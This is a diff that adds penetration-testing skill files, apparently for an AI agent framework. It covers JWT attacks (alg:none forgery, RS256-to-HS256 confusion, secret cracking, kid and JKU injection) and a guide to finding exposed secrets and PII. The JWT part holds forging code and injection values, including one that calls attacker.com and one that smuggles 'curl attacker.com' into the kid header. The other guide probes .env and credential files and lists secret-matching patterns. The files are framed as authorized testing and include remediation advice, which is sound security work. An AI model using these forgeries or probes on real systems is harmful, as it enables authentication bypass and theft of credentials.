+# Examine JWT in jwt.io
+# Check: algorithm (alg), key ID (kid), issuer (iss), audience (aud)
+# Check: expiration (exp), not-before (nbf), claims (role, admin, etc.)
+
+# Example JWT header inspection
+# {"alg":"RS256","typ":"JWT","kid":"key-1"}
+# Look for: alg, kid, jku, jwk, x5u, x5c headers
+```
+
+### Step 2 — Test "None" Algorithm Bypass
+```bash
+# Change algorithm to "none" and remove signature
+python3 jwt_tool.py <JWT_TOKEN> -X a
+
+# Manual none algorithm attack:
+# Original header: {"alg":"HS256","typ":"JWT"}
+# Modified header: {"alg":"none","typ":"JWT"}
+# Encode new header, keep payload, remove signature (empty string after last dot)
+
+# Variations to try:
+# "alg": "none"
+# "alg": "None"
+# "alg": "NONE"
+# "alg": "nOnE"
+
+# Send forged token
+curl -H "Authorization: Bearer <FORGED_TOKEN>" http://target.com/api/admin
+
+# jwt_tool automated none attack
+python3 jwt_tool.py <JWT_TOKEN> -X a -I -pc role -pv admin
+```
+
+### Step 3 — Test Algorithm Confusion (RS256 to HS256)
+```bash
+# If server uses RS256, attempt to switch to HS256 using public key as HMAC secret
+
+# Step 1: Obtain the public key
+# From JWKS endpoint
+curl http://target.com/.well-known/jwks.json
+
+# From SSL certificate
+openssl s_client -connect target.com:443 </dev/null 2>/dev/null | \
+  openssl x509 -pubkey -noout > public_key.pem
+
+# Step 2: Forge token using public key as HMAC secret
+python3 jwt_tool.py <JWT_TOKEN> -X k -pk public_key.pem
+
+# Manual algorithm confusion:
+# Change header from {"alg":"RS256"} to {"alg":"HS256"}
+# Sign with public key using HMAC-SHA256
+python3 -c "
+import jwt
+with open('public_key.pem', 'r') as f:
+    public_key = f.read()
+payload = {'sub': 'admin', 'role': 'admin', 'iat': 1700000000, 'exp': 1900000000}
+token = jwt.encode(payload, public_key, algorithm='HS256')
+print(token)
+"
+```
+
+### Step 4 — Test Key ID (kid) Parameter Injection
+```bash
+# SQL Injection via kid
+python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "' UNION SELECT 'secret-key' FROM dual--" \
+  -S hs256 -p "secret-key"
+
+# Path Traversal via kid
+python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "../../dev/null" \
+  -S hs256 -p ""
+
+# Kid pointing to empty file (sign with empty string)
+python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "/dev/null" -S hs256 -p ""
+
+# SSRF via kid (if kid fetches remote key)
+python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "http://attacker.com/key"
+
+# Command injection via kid (rare but possible)
+python3 jwt_tool.py <JWT_TOKEN> -I -hc kid -hv "key1|curl attacker.com"
+```
+
+### Step 5 — Test JKU/X5U Header Injection
+```bash
+# JKU (JSON Web Key Set URL) injection
+# Point jku to attacker-controlled JWKS
+# Step 1: Generate key pair
+python3 jwt_tool.py <JWT_TOKEN> -X s
+
+# Step 2: Host JWKS on attacker server
+# jwt_tool generates jwks.json - host it at http://attacker.com/.well-known/jwks.json
+
+# Step 3: Modify JWT header to point to attacker JWKS
+python3 jwt_tool.py <JWT_TOKEN> -X s -ju "http://attacker.com/.well-known/jwks.json"
+
+# X5U (X.509 certificate URL) injection
+# Similar to JKU but using X.509 certificate chain
+python3 jwt_tool.py <JWT_TOKEN> -I -hc x5u -hv "http://attacker.com/cert.pem"
+
+# Embedded JWK attack (inject key in JWT header itself)
+python3 jwt_tool.py <JWT_TOKEN> -X i
+```
+
+### Step 6 — Brute-Force Weak JWT Secrets
+```bash
+# Brute-force HMAC secret with hashcat
+hashcat -a 0 -m 16500 <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
+
+# Using jwt_tool wordlist attack
+python3 jwt_tool.py <JWT_TOKEN> -C -d /usr/share/wordlists/rockyou.txt
+
+# Using john the ripper
+echo "<JWT_TOKEN>" > jwt.txt
+john jwt.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
+
+# Common weak secrets to try:
+# secret, password, 123456, admin, test, key, jwt_secret
+# Also try: application name, company name, domain name
+
+# Once secret is found, forge arbitrary tokens
+python3 jwt_tool.py <JWT_TOKEN> -S hs256 -p "discovered_secret" \
+  -I -pc role -pv admin -pc sub -pv "admin@target.com"
+```
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| Algorithm Confusion | Switching from asymmetric (RS256) to symmetric (HS256) using public key as secret |
+| None Algorithm | Setting alg to "none" to create unsigned tokens accepted by misconfigured servers |
+| Kid Injection | Exploiting the Key ID header parameter for SQLi, path traversal, or SSRF |
+| JKU/X5U Injection | Pointing key source URLs to attacker-controlled servers for key substitution |
+| Weak Secret | HMAC secrets that can be brute-forced using dictionary attacks |
+| Claim Tampering | Modifying payload claims (role, sub, admin) after bypassing signature verification |
+| Token Replay | Reusing valid JWTs after the intended session should have expired |
+
+## Tools & Systems
+
+| Tool | Purpose |
+|------|---------|
+| jwt_tool | Comprehensive JWT testing and exploitation toolkit |
+| JWT Editor (Burp) | Burp Suite extension for JWT manipulation and attack automation |
+| hashcat | GPU-accelerated JWT secret brute-forcing (mode 16500) |
+| john the ripper | CPU-based JWT secret cracking |
+| jwt.io | Online JWT decoder and debugger for inspection |
+| PyJWT | Python library for programmatic JWT creation and verification |
+
+## Common Scenarios
+
+1. **None Algorithm Bypass** — Change JWT algorithm to "none", remove signature, and forge admin tokens on servers that accept unsigned JWTs
+2. **Algorithm Confusion RCE** — Switch RS256 to HS256 using leaked public key to forge arbitrary tokens for administrative access
+3. **Kid SQL Injection** — Inject SQL payload in kid parameter to extract the signing key from the database
+4. **Weak Secret Cracking** — Brute-force HMAC-SHA256 secrets using hashcat to forge arbitrary JWTs for any user
+5. **JKU Server Spoofing** — Point JKU header to attacker-controlled JWKS endpoint to sign tokens with attacker's private key
+
+## Output Format
+
+```
+## JWT Security Assessment Report
+- **Target**: http://target.com
+- **JWT Algorithm**: RS256 (claimed)
+- **JWKS Endpoint**: http://target.com/.well-known/jwks.json
+
+### Findings
+| # | Vulnerability | Technique | Impact | Severity |
+|---|--------------|-----------|--------|----------|
+| 1 | None algorithm accepted | alg: "none" | Auth bypass | Critical |
+| 2 | Algorithm confusion | RS256 -> HS256 | Token forgery | Critical |
+| 3 | Weak HMAC secret | Brute-force: "secret123" | Full token forgery | Critical |
+| 4 | Kid path traversal | kid: "../../dev/null" | Sign with empty key | High |
+
+### Remediation
+- Enforce algorithm whitelist in JWT verification (reject "none")
+- Use asymmetric algorithms (RS256/ES256) with proper key management
+- Implement strong, random secrets for HMAC algorithms (256+ bits)
+- Validate kid parameter against a strict allowlist
+- Ignore jku/x5u headers or validate against known endpoints
+- Set appropriate token expiration (exp) and implement token revocation
+```

--- a/security/skills/testing-for-json-web-token-vulnerabilities/references/api-reference.md
+++ b/security/skills/testing-for-json-web-token-vulnerabilities/references/api-reference.md
@@ -1,0 +1,59 @@
+# API Reference: Testing for JSON Web Token Vulnerabilities
+
+## JWT Attack Types
+
+| Attack | Severity | Description |
+|--------|----------|-------------|
+| alg:none bypass | Critical | Remove signature verification |
+| Weak HMAC secret | Critical | Brute-force signing key |
+| Algorithm confusion | Critical | RS256 -> HS256 with public key |
+| kid injection | High | Path traversal/SQLi in kid |
+| jku spoofing | High | Point JWKS to attacker server |
+| Claim tampering | High | Modify role/sub without re-sign |
+| Missing exp | High | Token never expires |
+
+## JWT Structure
+
+| Part | Content | Example |
+|------|---------|---------|
+| Header | Algorithm, type, kid | `{"alg":"HS256","typ":"JWT"}` |
+| Payload | Claims (sub, exp, iat, iss) | `{"sub":"1001","role":"user"}` |
+| Signature | HMAC or RSA signature | Base64url encoded |
+
+## JWT Testing Tools
+
+| Tool | Purpose |
+|------|---------|
+| jwt_tool | 12+ attack modes for JWT testing |
+| hashcat -m 16500 | GPU JWT HMAC secret cracking |
+| Burp JWT Editor | Interactive JWT manipulation |
+| jwt.io | Online JWT decoder |
+| john | CPU-based JWT secret cracking |
+
+## Standard Claims
+
+| Claim | Required | Purpose |
+|-------|----------|---------|
+| iss | Yes | Issuer identifier |
+| sub | Yes | Subject (user ID) |
+| aud | Yes | Intended audience |
+| exp | Yes | Expiration time |
+| iat | Recommended | Issued at time |
+| nbf | Optional | Not before time |
+| jti | Optional | JWT ID (replay prevention) |
+
+## Python Libraries
+
+| Library | Version | Purpose |
+|---------|---------|---------|
+| `base64` | stdlib | JWT encoding/decoding |
+| `hmac` | stdlib | HMAC signature generation |
+| `hashlib` | stdlib | Hash functions |
+| `json` | stdlib | JSON parsing |
+| `requests` | >=2.28 | Token testing against APIs |
+
+## References
+
+- jwt_tool: https://github.com/ticarpi/jwt_tool
+- PortSwigger JWT: https://portswigger.net/web-security/jwt
+- RFC 7519: https://www.rfc-editor.org/rfc/rfc7519

--- a/security/skills/testing-for-json-web-token-vulnerabilities/scripts/agent.py
+++ b/security/skills/testing-for-json-web-token-vulnerabilities/scripts/agent.py
@@ -1,0 +1,216 @@
+#!/usr/bin/env python3
+# For authorized penetration testing and educational environments only.
+# Usage against targets without prior mutual consent is illegal.
+# It is the end user's responsibility to obey all applicable local, state and federal laws.
+"""Agent for testing JSON Web Token vulnerabilities.
+
+Tests JWT implementations for algorithm confusion, none algorithm
+bypass, weak HMAC secrets, kid injection, missing claims, and
+token forgery to detect authentication bypass risks.
+"""
+
+import json
+import base64
+import hmac
+import hashlib
+import sys
+from pathlib import Path
+from datetime import datetime
+
+try:
+    import requests
+except ImportError:
+    requests = None
+
+
+COMMON_SECRETS = [
+    "secret", "password", "123456", "jwt_secret", "supersecret",
+    "key", "changeme", "default", "your-256-bit-secret",
+    "my-secret-key", "jwt-secret", "s3cr3t", "secret123",
+    "apisecret", "qwerty", "letmein", "1234567890",
+]
+
+
+class JWTTestAgent:
+    """Tests JWT implementations for security vulnerabilities."""
+
+    def __init__(self, base_url=None, output_dir="./jwt_test"):
+        self.base_url = base_url.rstrip("/") if base_url else None
+        self.output_dir = Path(output_dir)
+        self.output_dir.mkdir(parents=True, exist_ok=True)
+        self.findings = []
+
+    def decode_jwt(self, token):
+        """Decode JWT header and payload without verification."""
+        parts = token.split(".")
+        if len(parts) != 3:
+            return None, None, None
+        def pad(s):
+            return s + "=" * (4 - len(s) % 4)
+        try:
+            header = json.loads(base64.urlsafe_b64decode(pad(parts[0])))
+            payload = json.loads(base64.urlsafe_b64decode(pad(parts[1])))
+            return header, payload, parts[2]
+        except Exception:
+            return None, None, None
+
+    def analyze_token(self, token):
+        """Analyze JWT for security issues."""
+        header, payload, sig = self.decode_jwt(token)
+        if not header:
+            return {"error": "Invalid JWT"}
+
+        issues = []
+        alg = header.get("alg", "")
+        if alg == "none":
+            issues.append({"severity": "critical", "issue": "alg set to 'none'"})
+        if alg in ("HS256", "HS384", "HS512"):
+            issues.append({"severity": "info", "issue": f"Symmetric {alg} - test for weak secrets"})
+        if "kid" in header:
+            issues.append({"severity": "info", "issue": f"kid present: {header['kid']} - test for injection"})
+        if "jku" in header:
+            issues.append({"severity": "medium", "issue": f"jku present: {header['jku']} - test JWKS spoofing"})
+        if "exp" not in payload:
+            issues.append({"severity": "high", "issue": "No expiration claim"})
+        if "iss" not in payload:
+            issues.append({"severity": "medium", "issue": "No issuer claim"})
+        if "aud" not in payload:
+            issues.append({"severity": "medium", "issue": "No audience claim"})
+
+        for i in issues:
+            self.findings.append({"severity": i["severity"], "type": "JWT Analysis", "detail": i["issue"]})
+
+        return {"header": header, "payload": payload, "issues": issues}
+
+    def test_none_algorithm(self, token):
+        """Forge token with alg:none to bypass signature."""
+        header, payload, _ = self.decode_jwt(token)
+        if not header:
+            return []
+
+        header["alg"] = "none"
+        new_header = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip("=")
+        parts = token.split(".")
+        variants = [
+            f"{new_header}.{parts[1]}.",
+            f"{new_header}.{parts[1]}.{parts[2]}",
+            f"{new_header}.{parts[1]}.e30",
+        ]
+
+        results = []
+        if self.base_url and requests:
+            for v in variants:
+                resp = requests.get(f"{self.base_url}/users/me",
+                                    headers={"Authorization": f"Bearer {v}"}, timeout=10)
+                if resp.status_code == 200:
+                    results.append({"variant": v[:60], "accepted": True})
+                    self.findings.append({
+                        "severity": "critical",
+                        "type": "alg:none Bypass",
+                        "detail": "Server accepts JWT with alg:none",
+                    })
+        return variants
+
+    def brute_force_secret(self, token):
+        """Brute-force HMAC secret against common passwords."""
+        header, _, _ = self.decode_jwt(token)
+        if not header or header.get("alg") not in ("HS256", "HS384", "HS512"):
+            return None
+
+        parts = token.split(".")
+        signing_input = f"{parts[0]}.{parts[1]}".encode()
+        signature = parts[2]
+
+        alg_map = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}
+        h = alg_map[header["alg"]]
+
+        for secret in COMMON_SECRETS:
+            expected = base64.urlsafe_b64encode(
+                hmac.new(secret.encode(), signing_input, h).digest()
+            ).decode().rstrip("=")
+            if expected == signature:
+                self.findings.append({
+                    "severity": "critical",
+                    "type": "Weak JWT Secret",
+                    "detail": f"Secret found: '{secret}'",
+                })
+                return secret
+        return None
+
+    def forge_token(self, token, claims_override, secret=None):
+        """Forge a JWT with modified claims."""
+        header, payload, _ = self.decode_jwt(token)
+        if not header:
+            return None
+        payload.update(claims_override)
+        h_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip("=")
+        p_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip("=")
+        signing_input = f"{h_b64}.{p_b64}".encode()
+
+        if secret and header.get("alg") in ("HS256", "HS384", "HS512"):
+            alg_map = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}
+            sig = base64.urlsafe_b64encode(
+                hmac.new(secret.encode(), signing_input, alg_map[header["alg"]]).digest()
+            ).decode().rstrip("=")
+            return f"{h_b64}.{p_b64}.{sig}"
+        return f"{h_b64}.{p_b64}."
+
+    def test_kid_injection(self, token):
+        """Test kid header parameter for injection."""
+        header, payload, _ = self.decode_jwt(token)
+        if not header or "kid" not in header:
+            return []
+
+        payloads = [
+            "../../dev/null",
+            "' UNION SELECT 'secret' --",
+            "/proc/self/environ",
+        ]
+        results = []
+        for p in payloads:
+            results.append({"kid_payload": p, "test": "manual verification required"})
+        self.findings.append({
+            "severity": "medium",
+            "type": "kid Injection Candidates",
+            "detail": f"kid parameter present - test {len(payloads)} injection payloads",
+        })
+        return results
+
+    def generate_report(self, token=None):
+        analysis = None
+        secret = None
+        if token:
+            analysis = self.analyze_token(token)
+            secret = self.brute_force_secret(token)
+            self.test_none_algorithm(token)
+            self.test_kid_injection(token)
+
+        report = {
+            "report_date": datetime.utcnow().isoformat(),
+            "base_url": self.base_url,
+            "jwt_analysis": analysis,
+            "secret_found": secret,
+            "findings": self.findings,
+            "total_findings": len(self.findings),
+        }
+        out = self.output_dir / "jwt_test_report.json"
+        with open(out, "w") as f:
+            json.dump(report, f, indent=2)
+        print(json.dumps(report, indent=2))
+        return report
+
+
+def main():
+    if len(sys.argv) < 2:
+        print("Usage: agent.py <jwt_token> [--url <base_url>]")
+        sys.exit(1)
+    token = sys.argv[1]
+    url = None
+    if "--url" in sys.argv:
+        url = sys.argv[sys.argv.index("--url") + 1]
+    agent = JWTTestAgent(url)
+    agent.generate_report(token)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/testing-for-sensitive-data-exposure/SKILL.md
+++ b/security/skills/testing-for-sensitive-data-exposure/SKILL.md
@@ -1,0 +1,377 @@
+---
+name: testing-for-sensitive-data-exposure
+description: Identifying sensitive data exposure vulnerabilities including API key
+  leakage, PII in responses, insecure storage, and unprotected data transmission during
+  security assessments.
+domain: cybersecurity
+subdomain: web-application-security
+tags:
+- penetration-testing
+- data-exposure
+- pii
+- owasp
+- web-security
+- api-keys
+- secrets
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_ai_rmf:
+- MEASURE-2.7
+- MAP-5.1
+- MANAGE-2.4
+atlas_techniques:
+- AML.T0070
+- AML.T0066
+- AML.T0082
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1505.003
+- T1083
+---
+
+# Testing for Sensitive Data Exposure
+
+## When to Use
+
+- During authorized penetration tests when assessing data protection controls
+- When evaluating applications for GDPR, PCI DSS, HIPAA, or other data protection compliance
+- For identifying leaked API keys, credentials, tokens, and secrets in application responses
+- When testing whether sensitive data is properly encrypted in transit and at rest
+- During security assessments of APIs that handle PII, financial data, or health records
+
+## Prerequisites
+
+- **Authorization**: Written penetration testing agreement with data handling scope
+- **Burp Suite Professional**: For intercepting and analyzing responses for sensitive data
+- **trufflehog**: Secret scanning tool (`pip install trufflehog`)
+- **gitleaks**: Git repository secret scanner (`go install github.com/gitleaks/gitleaks/v8@latest`)
+- **curl/httpie**: For manual endpoint testing
+- **Browser DevTools**: For examining local storage, session storage, and cached data
+- **testssl.sh**: TLS configuration testing tool
+
+## Workflow
+
+### Step 1: Scan for Secrets in Client-Side Code
+
+Search JavaScript files, HTML source, and other client-side resources for exposed secrets.
+
+```bash
+# Download and search JavaScript files for secrets
+curl -s "https://target.example.com/" | \
+  grep -oP 'src="[^"]*\.js[^"]*"' | \
+  grep -oP '"[^"]*"' | tr -d '"' | while read js; do
+    echo "=== Scanning: $js ==="
+    # Handle relative URLs
+    if [[ "$js" == /* ]]; then
+      curl -s "https://target.example.com$js"
+    else
+      curl -s "$js"
+    fi | grep -inE \
+      "(api[_-]?key|apikey|api[_-]?secret|aws[_-]?access|aws[_-]?secret|private[_-]?key|password|secret|token|auth|credential|AKIA[0-9A-Z]{16})" \
+      | head -20
+done
+
+# Search for common secret patterns
+curl -s "https://target.example.com/static/app.js" | grep -nP \
+  "(AIza[0-9A-Za-z-_]{35}|AKIA[0-9A-Z]{16}|sk-[a-zA-Z0-9]{48}|ghp_[a-zA-Z0-9]{36}|xox[bpsa]-[0-9a-zA-Z-]{10,})"
+
+# Check source maps for exposed source code
+curl -s "https://target.example.com/static/app.js.map" | head -c 500
+# Source maps may contain original source code with embedded secrets
+
+# Search HTML source for exposed data
+curl -s "https://target.example.com/" | grep -inE \
+  "(api_key|secret|password|token|private_key|database_url|smtp_password)" | head -20
+
+# Check for exposed .env or configuration files
+for file in .env .env.local .env.production config.json settings.json \
+  .aws/credentials .docker/config.json; do
+  status=$(curl -s -o /dev/null -w "%{http_code}" \
+    "https://target.example.com/$file")
+  if [ "$status" == "200" ]; then
+    echo "FOUND: $file ($status)"
+  fi
+done
+```
+
+### Step 2: Analyze API Responses for Data Over-Exposure
+
+Check if API endpoints return more data than necessary.
+
+```bash
+# Fetch user profile and examine response fields
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/users/me" | jq .
+
+# Look for sensitive fields that should not be exposed:
+# - password, password_hash, password_salt
+# - ssn, social_security_number, national_id
+# - credit_card_number, card_cvv, card_expiry
+# - api_key, secret_key, access_token, refresh_token
+# - internal_id, database_id
+# - ip_address, session_id
+# - date_of_birth, drivers_license
+
+# Check list endpoints for excessive data
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/users" | jq '.[0] | keys'
+
+# Compare public vs authenticated responses
+echo "=== Public ==="
+curl -s "https://target.example.com/api/users/1" | jq 'keys'
+echo "=== Authenticated ==="
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/users/1" | jq 'keys'
+
+# Check error responses for information leakage
+curl -s -X POST \
+  -H "Content-Type: application/json" \
+  -d '{"invalid": "data"}' \
+  "https://target.example.com/api/users" | jq .
+# Look for: stack traces, database queries, internal paths, version info
+
+# Test for PII in search/autocomplete responses
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/search?q=john" | jq .
+# May return full user records instead of just names
+```
+
+### Step 3: Test Data Transmission Security
+
+Verify that sensitive data is encrypted during transmission.
+
+```bash
+# Check TLS configuration
+# Using testssl.sh
+./testssl.sh "https://target.example.com"
+
+# Quick TLS checks with curl
+curl -s -v "https://target.example.com/" 2>&1 | grep -E "(SSL|TLS|cipher|subject)"
+
+# Check for HTTP (non-HTTPS) endpoints
+curl -s -I "http://target.example.com/" | head -5
+# Should redirect to HTTPS
+
+# Check for mixed content (HTTP resources on HTTPS pages)
+curl -s "https://target.example.com/" | grep -oP "http://[^\"'> ]+" | head -20
+
+# Check if sensitive forms submit over HTTPS
+curl -s "https://target.example.com/login" | grep -oP 'action="[^"]*"'
+# Form action should use HTTPS
+
+# Check for sensitive data in URL parameters (query string)
+# URLs are logged in browser history, server logs, proxy logs, Referer headers
+# Look for: /login?username=admin&password=secret
+# /api/data?ssn=123-45-6789
+# /search?credit_card=4111111111111111
+
+# Check WebSocket encryption
+curl -s "https://target.example.com/" | grep -oP "(ws|wss)://[^\"'> ]+"
+# ws:// is unencrypted; should only use wss://
+```
+
+### Step 4: Examine Browser Storage for Sensitive Data
+
+Check local storage, session storage, cookies, and cached responses.
+
+```bash
+# Check what cookies are set and their security attributes
+curl -s -I "https://target.example.com/login" | grep -i "set-cookie"
+
+# In browser DevTools (Application tab):
+# 1. Local Storage: Check for stored tokens, PII, credentials
+# 2. Session Storage: Check for temporary sensitive data
+# 3. IndexedDB: Check for cached application data
+# 4. Cache Storage: Check for cached API responses containing PII
+# 5. Cookies: Check for sensitive data in cookie values
+
+# Common insecure storage patterns:
+# localStorage.setItem('access_token', 'eyJ...');  // XSS can steal
+# localStorage.setItem('user', JSON.stringify({email: '...', ssn: '...'}));
+# sessionStorage.setItem('credit_card', '4111...');
+
+# Check for autocomplete on sensitive forms
+curl -s "https://target.example.com/login" | \
+  grep -oP '<input[^>]*(password|credit|ssn|card)[^>]*>' | \
+  grep -v 'autocomplete="off"'
+# Password and credit card fields should have autocomplete="off"
+
+# Check Cache-Control headers on sensitive pages
+for page in /account/profile /api/users/me /transactions /billing; do
+  echo -n "$page: "
+  curl -s -I "https://target.example.com$page" \
+    -H "Authorization: Bearer $TOKEN" | \
+    grep -i "cache-control" | tr -d '\r'
+  echo
+done
+# Sensitive pages should have: Cache-Control: no-store
+```
+
+### Step 5: Scan Git Repositories and Source Code for Secrets
+
+Search for accidentally committed secrets in version control.
+
+```bash
+# Check for exposed .git directory
+curl -s "https://target.example.com/.git/config"
+curl -s "https://target.example.com/.git/HEAD"
+
+# If .git is exposed, use git-dumper to download
+# pip install git-dumper
+git-dumper https://target.example.com/.git /tmp/target-repo
+
+# Scan downloaded repository with trufflehog
+trufflehog filesystem /tmp/target-repo
+
+# Scan with gitleaks
+gitleaks detect --source /tmp/target-repo -v
+
+# If GitHub/GitLab repository is available (authorized scope)
+trufflehog github --org target-organization --token $GITHUB_TOKEN
+gitleaks detect --source https://github.com/org/repo -v
+
+# Common secrets found in repositories:
+# - AWS access keys (AKIA...)
+# - Database connection strings
+# - API keys (Google, Stripe, Twilio, SendGrid)
+# - Private SSH keys
+# - JWT signing secrets
+# - OAuth client secrets
+# - SMTP credentials
+
+# Search for secrets in Docker images
+# docker save target-image:latest | tar x -C /tmp/docker-layers
+# Search each layer for credentials
+```
+
+### Step 6: Test Data Masking and Redaction
+
+Verify that sensitive data is properly masked in the application.
+
+```bash
+# Check if credit card numbers are fully displayed
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/payment-methods" | jq .
+# Should show: **** **** **** 4242, not full number
+
+# Check if SSN/national ID is masked
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/users/me" | jq '.ssn'
+# Should show: ***-**-6789, not full SSN
+
+# Check API responses for password hashes
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/users" | jq '.[].password // empty'
+# Should return nothing; password hashes should never be in API responses
+
+# Check export/download features for unmasked data
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/users/export?format=csv" | head -5
+# CSV exports often contain unmasked PII
+
+# Check logging endpoints for sensitive data
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://target.example.com/api/admin/logs" | \
+  grep -iE "(password|token|secret|credit_card|ssn)" | head -10
+# Logs should not contain sensitive data in plaintext
+
+# Test for sensitive data in error messages
+curl -s -X POST \
+  -H "Content-Type: application/json" \
+  -d '{"email":"duplicate@test.com"}' \
+  "https://target.example.com/api/register"
+# Should not reveal: "User with email duplicate@test.com already exists"
+# Should show: "Registration failed" (generic)
+```
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| **Sensitive Data Exposure** | Unintended disclosure of PII, credentials, financial data, or health records |
+| **Data Over-Exposure** | API returning more data fields than the client needs |
+| **Secret Leakage** | API keys, tokens, or credentials exposed in client-side code or logs |
+| **Data at Rest** | Sensitive data stored in databases, files, or backups without encryption |
+| **Data in Transit** | Sensitive data transmitted over network without TLS encryption |
+| **Data Masking** | Replacing sensitive data with redacted values (e.g., showing last 4 digits of credit card) |
+| **PII** | Personally Identifiable Information - data that can identify an individual |
+| **Information Leakage** | Excessive error messages, stack traces, or debug information in responses |
+
+## Tools & Systems
+
+| Tool | Purpose |
+|------|---------|
+| **Burp Suite Professional** | Response analysis and regex-based sensitive data scanning |
+| **trufflehog** | Secret detection across git repos, filesystems, and cloud storage |
+| **gitleaks** | Git repository scanning for hardcoded secrets |
+| **testssl.sh** | TLS/SSL configuration assessment |
+| **git-dumper** | Downloading exposed .git directories from web servers |
+| **SecretFinder** | JavaScript file analysis for exposed API keys and tokens |
+| **Retire.js** | Detecting JavaScript libraries with known vulnerabilities |
+
+## Common Scenarios
+
+### Scenario 1: API Key in JavaScript Bundle
+The application's JavaScript bundle contains a hardcoded Google Maps API key and a Stripe publishable key. The Stripe key has overly broad permissions, allowing the attacker to create charges.
+
+### Scenario 2: User API Returns Password Hashes
+The `/api/users` endpoint returns complete user objects including bcrypt password hashes. Attackers can extract hashes and attempt offline cracking.
+
+### Scenario 3: PII in Cached API Responses
+The user profile API endpoint returns full SSN and credit card numbers without masking. The endpoint does not set `Cache-Control: no-store`, so responses are cached in the browser and proxy caches.
+
+### Scenario 4: Git Repository with Database Credentials
+The `.git` directory is accessible on the production server. Using git-dumper, the attacker downloads the repository history, finding database credentials committed in an early commit that were later "removed" but remain in git history.
+
+## Output Format
+
+```
+## Sensitive Data Exposure Assessment Report
+
+**Target**: target.example.com
+**Assessment Date**: 2024-01-15
+**OWASP Category**: A02:2021 - Cryptographic Failures
+
+### Findings Summary
+| Finding | Severity | Data Type |
+|---------|----------|-----------|
+| API keys in JavaScript source | High | Credentials |
+| Password hashes in API response | Critical | Authentication |
+| Unmasked SSN in user profile | Critical | PII |
+| Credit card number in export | High | Financial |
+| .git directory exposed | Critical | Source code + secrets |
+| Missing TLS on API endpoint | High | All data in transit |
+| Sensitive data in error messages | Medium | Technical info |
+
+### Critical: Exposed Secrets
+| Secret Type | Location | Risk |
+|-------------|----------|------|
+| AWS Access Key (AKIA...) | /static/app.js line 342 | AWS resource access |
+| Stripe Secret Key (sk_live_...) | .env (via .git exposure) | Payment processing |
+| Database URL with credentials | .git history commit abc123 | Database access |
+| JWT Signing Secret | config.json (via .git) | Token forgery |
+
+### Data Over-Exposure in APIs
+| Endpoint | Unnecessary Fields Returned |
+|----------|-----------------------------|
+| GET /api/users | password_hash, internal_id, created_ip |
+| GET /api/users/{id} | ssn, credit_card_full, date_of_birth |
+| GET /api/orders | customer_phone, customer_address |
+
+### Recommendation
+1. Remove all hardcoded secrets from client-side code; use backend proxies
+2. Rotate all exposed credentials immediately
+3. Remove .git directory from production web root
+4. Implement response field filtering; return only required fields
+5. Mask sensitive data (SSN, credit card) in all API responses
+6. Add Cache-Control: no-store to all sensitive endpoints
+7. Enable TLS 1.2+ on all endpoints; redirect HTTP to HTTPS
+8. Implement secret scanning in CI/CD pipeline (trufflehog/gitleaks)
+```

--- a/security/skills/testing-for-sensitive-data-exposure/references/api-reference.md
+++ b/security/skills/testing-for-sensitive-data-exposure/references/api-reference.md
@@ -1,0 +1,50 @@
+# API Reference: Testing for Sensitive Data Exposure
+
+## requests Library
+
+### TLS Verification
+```python
+# Check HTTP to HTTPS redirect
+resp = requests.get("http://target.com/", allow_redirects=False)
+
+# Check HSTS header
+resp = requests.get("https://target.com/")
+hsts = resp.headers.get("Strict-Transport-Security", "")
+```
+
+## Secret Detection Patterns
+| Pattern | Regex | Example |
+|---------|-------|---------|
+| AWS Access Key | `AKIA[0-9A-Z]{16}` | AKIAIOSFODNN7EXAMPLE |
+| Google API Key | `AIza[0-9A-Za-z\-_]{35}` | AIzaSyA... |
+| Stripe Secret | `sk_live_[0-9a-zA-Z]{24,}` | sk_live_... |
+| GitHub Token | `ghp_[a-zA-Z0-9]{36}` | ghp_xxxx... |
+| Private Key | `-----BEGIN PRIVATE KEY-----` | PEM format |
+
+## Exposed File Checks
+| File | Risk |
+|------|------|
+| `.env` | Environment variables with secrets |
+| `.git/config` | Git configuration (may contain tokens) |
+| `config.json` | Application configuration |
+| `.aws/credentials` | AWS access keys |
+| `phpinfo.php` | Server configuration disclosure |
+
+## Sensitive API Response Fields
+Fields that should never appear in API responses:
+- `password`, `password_hash`, `salt`
+- `ssn`, `credit_card`, `cvv`
+- `api_key`, `secret_key`, `private_key`
+- `access_token`, `refresh_token`
+
+## Cache-Control for Sensitive Pages
+```
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+```
+
+## References
+- OWASP A02:2021 Cryptographic Failures: https://owasp.org/Top10/A02_2021-Cryptographic_Failures/
+- OWASP Sensitive Data Exposure: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/
+- trufflehog: https://github.com/trufflesecurity/trufflehog
+- gitleaks: https://github.com/gitleaks/gitleaks

